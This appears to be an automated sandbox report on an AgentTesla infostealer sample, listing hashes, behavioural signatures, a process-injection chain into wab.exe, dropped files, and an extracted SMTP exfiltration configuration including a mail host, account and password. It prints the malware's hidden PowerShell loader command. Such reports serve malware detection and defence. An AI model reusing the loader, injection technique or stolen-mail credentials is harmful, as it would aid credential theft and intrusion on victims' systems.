Analysis
- max time kernel: 147s
- max time network: 134s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 24-06-2024 11:17
Static task: static1
Behavioral task: behavioral1
- Sample: doc20240624-00073.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: doc20240624-00073.exe
- Resource: win10v2004-20240508-en
General
- Target: doc20240624-00073.exe
- Size: 623KB
- MD5: 43970c342a6f6849918eff777d391439
- SHA1: 58a9e9e70a97dc454e5462259a90709c8df789f6
- SHA256: 9a46488fbf68e28b2f3e84183fe6100ad7b0a0f72628ca90f02de0b05a8ff5fc
- SHA512: e6ab83f9431d3baa50201947a06851f5b74916b48b64d068cddb453c5addc9b7cf39d1246d83d70fc18fadb46c854f6c22535d42a080ee9d624ff9fb30104200
- SSDEEP: 6144:Z4SUjhtcUB6uitM/DOfM1PzrgFswogtKxaqcYe29nOAw3YLS/KSGBG9xNG1E:CilWLe+P0swbEXcX2NOAK/KH8NGC
Malware Config
Extracted
agenttesla
- Protocol: smtp
- Host: cpanel17.rackforest.com
- Port: 587
- Username: [email protected]
- Password: boygirl123456
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Runs PowerShell with the display window hidden.
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  10 | ip-api.com
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  Processes:
  pid | process
  2372 | wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes:
  pid | process
  2556 | powershell.exe
  2372 | wab.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes:
  description | pid | process | target process
  PID 2556 set thread context of 2372 | 2556 | powershell.exe | wab.exe
- Drops file in Windows directory (2 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Windows\Fonts\Impeccability29\Saxten.luc | doc20240624-00073.exe
  File opened for modification | C:\Windows\resources\Strmpeskafterne\Tortrix.ini | doc20240624-00073.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes:
  pid | process
  2556 | powershell.exe (8 events)
  2372 | wab.exe (2 events)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
  pid | process
  2556 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2556 | powershell.exe
  Token: SeDebugPrivilege | 2372 | wab.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
  description | pid | process | target process
  PID 2964 wrote to memory of 2556 | 2964 | doc20240624-00073.exe | powershell.exe (4 events)
  PID 2556 wrote to memory of 2372 | 2556 | powershell.exe | wab.exe (6 events)
Processes
1. C:\Users\Admin\AppData\Local\Temp\doc20240624-00073.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\doc20240624-00073.exe"
   - Drops file in Windows directory
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Egebjergs=Get-Content 'C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Salomes.Ord';$Tergant254=$Egebjergs.SubString(50482,3);.$Tergant254($Egebjergs)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Program Files (x86)\windows mail\wab.exe
         Command line: "C:\Program Files (x86)\windows mail\wab.exe"
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Pipetting.bla
  Filesize: 323KB
  MD5: a4f70a014d8973f08700e2ee02cd565e
  SHA1: cf484471a00a331264a810a6b4b9945f56d3ec58
  SHA256: 9953bb9da1b287b48eaa39be1e23f510dd49f13fed83a95f0b470de8f8dd8220
  SHA512: a09212a0b602ece3eb7b9209b189dfb0a138c428bbb5acf645fce1a4ebb2af6a0908de32d2cd16061f89f92163281f77e7b6bc54fed2a88c00518fc27070f6f9
- C:\Users\Admin\AppData\Local\cardioparplasis\navnlse\Salomes.Ord
  Filesize: 49KB
  MD5: d4967d4847a0f4364f49c4724bf309b6
  SHA1: 2c1eb423b2e150b7c25ab03549eb903b645f2481
  SHA256: 27abbbba12f54d62ab075cd90263e61cc47e03c8c4f4555644843b9f3182da0f
  SHA512: 63ad7d1ef9d3487f66fb8c05abe30bce0cd5f9558d0db709c387225f8686701fadfe1b528031792689f58c91dd722184a4ca2ee50756866ccb133d0b68e79b76
- memory/2372-32-0x0000000000BA0000-0x0000000001C02000-memory.dmp
  Filesize: 16.4MB
- memory/2372-33-0x0000000000BA0000-0x0000000000BE2000-memory.dmp
  Filesize: 264KB
- memory/2556-16-0x0000000006640000-0x00000000071B6000-memory.dmp
  Filesize: 11.5MB